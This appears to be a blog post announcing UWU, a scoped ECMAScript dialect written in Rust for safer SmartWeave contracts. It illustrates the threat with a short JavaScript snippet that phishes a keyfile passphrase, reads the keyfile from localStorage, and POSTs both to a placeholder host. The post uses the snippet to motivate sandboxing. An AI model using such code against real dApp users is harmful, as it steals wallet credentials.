UWU, A New Safe Language For Writing Smartweave Contracts!
The Verto Protocol team showcased a new safe language for writing SmartWeave contracts called UWU in a live stream on Discord today. The live stream included a build of a simple NFT contract.
What is SmartWeave?
Smartweave is a smart contract protocol, enabling computation-heavy dApps on top of the Arweave network. SmartWeave uses the AR token to enable developers to build all types of smart contract applications using Javascript. More informations about smarweave.
What is UWU? And how it works?
uwu transpiles to safe and pluggable code.
- Subset of ECMAScript (similar syntax).
- Strictly scoped.
- Robust error messages. (codespan_diagnostics)
the situation
possible exploitation
const paraphrase = prompt(“To proceed enter your keyfile
paraphrase”); // because why not
const keyfile = localStorage.getItem(“keyfile”); // uh oh!
await fetch(`x.x.x.x:80`, {
method: “POST”,
body: JSON.stringify({ paraphrase, keyfile }),
});
possible solutions
- “Try” sandboxing
Use a remote execution server (uh no…centralised) – Piston
`delete` APIs from context (uh no…that’s bodge)
Static code analysis (hmm..ok?) – nestdotland/analyzer
Runtime injections (uh let’s try) – littledivy/deno_iroh.js
- Don’t “try” sandboxing
Just create your own dialect of ECMAScript with on-the-fly compilation.
uwu is written in Rust.
- Memory safety and speed.
- Compiles to WASM for direct usage on web.
- Available as a Rust crate for embedding purposes.
uwu is easy to learn.
- Straightforward syntax that covers important ECMAScript fundamentals.
let a = 1
let b = 2
fn add(x, y):
return x + y
end
add(1, 2)
uwu is scoped.
- Scoped by default. Nothing is accessible unless given permission to do so. The following code will not compile:
let jwk = localStorage.getItem(“keyfile”);
# Most dApps store keyfile in the localStorage of the
# browser.
# It can be easily extracted by any external source
# running on the same
# website (for eg: A smartweave contract)
- Optional type checking. (default=false, experimental=true)
let pi = 3.14
pi = “a string” # compiler error
uwu integrates well
- The compiler is available as a standalone javascript library, a rust crate and a command line application.
import compile from “@useverto/uwu”;
const [js, diagnostics] = compile(“1 + 1”);
Track library development here: https://github.com/useverto/uwu/tree/main/wasm
uwu produces friendly errors
- Robust error messages.
error: no item named `localStorage` found in scope.
–> test.uwu:1:11
|
1 | localStorage[“getItem”](“apiKey”)
| — associated item `localStorage` is not declared
uwu internals
uwu cli
- Command line application for compiling .uwu source files.
Future plans:
- .uwurc for configuring the compiler
uwu compiler configuration
Customize how the compiler behaves.
// PS: Compiler configuration is not yet implemented. This is a rough idea of
// how it will be.
// Create a scope and declare externs
let scope = Scope::new(vec![(“parseInt”, type::Function)]);
let ast = Parser::new(Lexer::new(“parseInt()”)).parse()?;
// Create a compiler instance with source ast and scope.
let compiler = Compiler::new(ast, scope);
compiler.compile()?;
uwu is open source
A th8ta project.
